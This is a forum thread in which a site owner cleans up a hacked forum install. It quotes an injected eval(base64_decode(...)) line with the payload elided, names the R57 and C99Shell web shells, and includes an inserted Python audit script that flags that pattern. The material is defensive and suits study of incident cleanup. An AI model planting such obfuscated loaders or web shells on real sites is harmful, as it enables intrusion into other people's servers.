new forum with old data

Started by cafecommk, February 08, 2009, 02:27:57 PM


cafecommk

Can I install a new version (2.0) on a different location and then copy the users and everything else from the old one (1.1...)?

H

Easiest thing to do is restore the 1.1 files and database and then overwrite the 2.0 upgrade package over it and then run upgrade.php :)
-H
Former Support Team Lead
I recommend:
Namecheap (domains)
Fastmail (e-mail)
Linode (VPS)

Xylar2

No, he means can he use the same SQL database for a new forum. So he doesn't lose all his posts/members/settings.

H

I know :). But as attachments and avatars will probably need to be preserved it is easiest just to copy EVERYTHING :)
-H

cafecommk

I see. But ...how can i clean infiltrations. i have found one folder so far that has files someone else has put there (like ads for medicine or similar). I am afraid they don't get in again.

thanks

Neorics

I suggest upgrading to just 1.1.8 then and not 2.0 cause I think 1.1.8 is more secured at the moment.

Then just delete that folder and make sure to set the file permissions to Only the Standard files are writable in the Admin>Packages>Options
[For Hire] I can help you with anything regarding Simple Machines Forum  ~ My Portfolio

H

2.0 and 1.1.x are both equally covered regarding security updates.

Easiest thing to do then is ensure attachments/ is copied from the old server as well as settings.php. Then upload the upgrade archive and run update.php :)
-H

cafecommk

when i run the upgrade....would it overwrite the folders that the forum does not need (the infiltrations)?


Thank You H for Your help

Antechinus

The unwanted code will be in your files and they will be overwritten by the new files so yes, it should wipe that code.
The only way this would not work is if the injected code is in Settings.php, but you can check that file yourself.

cafecommk

This is huge help for me. thanks.
the code i did find is in
/forum/mambots/editors/tinymce/jscripts/tiny_mce/plugins/media/images/paste/jscripts

i was scared if there were more.
i will check the settings.php

thank you tonnes


edit: My version of SMF is:
* Software Version: SMF 1.1.2

I also have in the first line of the file settings.php: /**/eval(base64_decode('...'));

I guess this is a hack? And I have it in many files :(
Any advice on how to proceed?

N3RVE

Yes, that looks like a hack.
The Large Upgrade package will overwrite all files excluding Settings.php and Settings_bak.php, seeing that both files contain sensitive information that should *not* be viewable on a public forum such as this one, you should try to clean it yourself, see a default one to see what is needed and read the comment lines, If you can't, E-mail me a copy so I can clean it up for you or build a new one using the connection combination from the hacked copy, the most important variables are $db_server, $db_name, $db_username and $db_passwd :)

-[n3rve]
Ralph "[n3rve]" Otowo
Former Marketing Co-ordinator, Simple Machines.
ralph [at] simplemachines [dot] org
Quote: "Somewhere, something incredible is waiting to be known." - Carl Sagan

cafecommk

please tell me how to send You the file.

Thanks a billion

i sent you an email, but can't attach.

N3RVE

ralph[at]simplemachines.org
Note that I won't be able to attend to this in the next hour or two, I'm currently mobile :)

-[n3rve]

N3RVE

(Got your PM)
Downloaded the file and replied, yeah, that file has some code that isn't needed, I'll clean it when I return to a PC, post my findings here and send you a sanitized copy ;)

-[n3rve]

cafecommk

This is what i did. I created a new folder /forum
Copied everything in it.
Uploaded large upgrade package-clicked yes to overwrite
uploaded the file settings.php (after I have deleted the top eval line)
and i check if it is ok. when i ran the cafe.mk/forum    nothing happened. blank screen. I checked the files and i see the line eval still is there in all my php files :(
and just before i started crying :) i got the pm from you and got hope back.
this is printscreen of the forum folder. i think i have too many folders in there :)


I am waiting for instructions.

I am thinking how noble it is to help people even on the mobile :)


edit: this is available to me:  http://cafe.mk/forum/upgrade.php  maybe it will fix things:)
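
Added example (not part of the original thread, and not SMF's own code): a small audit for the situation described above, where the eval(base64_decode(...)) line is still present after the upgrade and extra folders remain. It compares the live forum directory with a freshly unpacked copy of the same package and lists files carrying the injected call, files the package does not ship, and shipped files whose content differs. The names `audit`, `index_tree` and `demo` are hypothetical, and the sample trees and the 'AAAA' payload are constructed for illustration.

```python
import hashlib, os, pathlib, re, tempfile

# The marker reported in the thread: eval(base64_decode('...')) inside PHP files.
INJECT_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)
# Site-specific files the upgrade package does not overwrite (per the thread).
SITE_FILES = ("Settings.php", "Settings_bak.php")

def index_tree(root):
    """Map each file's path relative to root -> (sha256 hex, raw bytes)."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            out[rel] = (hashlib.sha256(data).hexdigest(), data)
    return out

def audit(live_root, clean_root):
    """Compare the live forum tree with a freshly unpacked package."""
    clean = index_tree(clean_root)
    report = {"injected": [], "unknown": [], "modified": []}
    for rel, (digest, data) in sorted(index_tree(live_root).items()):
        if rel.lower().endswith(".php") and INJECT_RE.search(data):
            report["injected"].append(rel)      # must be cleaned or replaced
        if rel in SITE_FILES:
            continue                            # expected to differ; review by hand
        if rel not in clean:
            report["unknown"].append(rel)       # not shipped by the package
        elif clean[rel][0] != digest:
            report["modified"].append(rel)      # shipped, but content changed
    return report

def demo():
    """Run the audit on two small constructed trees (not real SMF files)."""
    bad = b"<?php /**/eval(base64_decode('AAAA')); ?>\n"   # constructed payload
    good = b"<?php echo 'ok'; ?>\n"
    with tempfile.TemporaryDirectory() as tmp:
        files = {"clean/index.php": good, "clean/Sources/Load.php": good,
                 "live/index.php": bad + good, "live/Sources/Load.php": good,
                 "live/Settings.php": bad, "live/extra/ads.html": b"<p>ad</p>"}
        for rel, data in files.items():
            path = pathlib.Path(tmp, rel)
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(data)
        return audit(os.path.join(tmp, "live"), os.path.join(tmp, "clean"))

if __name__ == "__main__":
    print(demo())
```

Legitimate uploads such as attachments and avatars will also appear under "unknown", so that list is a review queue rather than a delete list.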

cafecommk

Thank You [n3rve]  for all the help yesterday and sorry for the trouble.
I can not explain how You fixed the problem, but I know I gave You too much trouble.

I deleted most of the files unneeded so it should be ok now. The forum is working, I will try and fix things one at a time. But I really need You to tell me how did You make the text readable in Cyrillic. Do I have to change in the database...or...?

Thanks again

the forum is at cafe.mk/forum

N3RVE

Nothing was done to make the chars readable, after extracting and merging all those tables, everything worked. It seems we'll have to go through all that stress to get the forum working again, so you have to create a new database and import the backup I asked you to download yesterday.
When I get online, I'll add the other tables and then we can establish connection between the database and fresh SMF files.

Before we do this, Please, ensure that you have deleted / taken off the server, all unneeded files and updated all other softwares on the server. Also change all access passwords, 'cos we don't know how that hacker is getting in. When that is done, I'll fix it again.
Note: I won't be able to fix 'til tomorrow ;)

-[n3rve]

cafecommk

i suggest we give it a few days to see if i get any problems. I would not want to fix it and then someone destroy it again. i think i cleaned it all, but still would not risk.
I will get back to you in a few days. Thank you for reconsidering.

cafecommk

Hello,
It's been a few days and no strange activities on the server. so i think it is safe to go on. i check a lot of the folders and can not notice anything weird.
I would like to fix the forum if you could help me whenever you are online maybe tomorrow night (in 24 hours) or saturday morning.

Anyway i posted for help on security and i got following:
http://forums.digitalpoint.com/showthread.php?t=1230788


Your website was exploited using a remote javascript exploit.

Then the PHP Based trojan R57.PHP and C99Shell.php were installed on your server.

I can secure your server and place detection systems to alert you who is doing it also when and where the hack attempt is taking place.

For the time this would take i'd only charge $30 and have this done within about 30 mins to one hour.



different one

I can do this repair for $15.

Quote:
Originally Posted by cafecommk
Quote:
Originally Posted by 3roken
Your website was exploited using a remote javascript exploit.

Then the PHP Based trojan R57.PHP and C99Shell.php were installed on your server.

I can secure your server and place detection systems to alert you who is doing it also when and where the hack attempt is taking place.

For the time this would take i'd only charge $30 and have this done within about 30 mins to one hour.
thank you for your sincere offer. i am considering it. I will let you know when i decide to.
thank you



different person
Hi cafe, plz tell your site. If your site is non-commercial or non-business, I can give you a free security scan. What you give me back is you authorize me for security testing and testimonial that I've pentested your site.

second letter
Re: plz tell your site
that you authorize me is

- You allow me to perform security testing

You'll have to verify the site ownership by placing

- allow-yehg.net file at your root folder.



thank you much

cafecommk

Hello again. I have everything ready for whenever You get the time. The account is clean and the site is up. I can not go on on my own because we were interrupted in the middle of fixing things. I do not know what was going on.
Please get in touch with me anytime that fits you

thank you
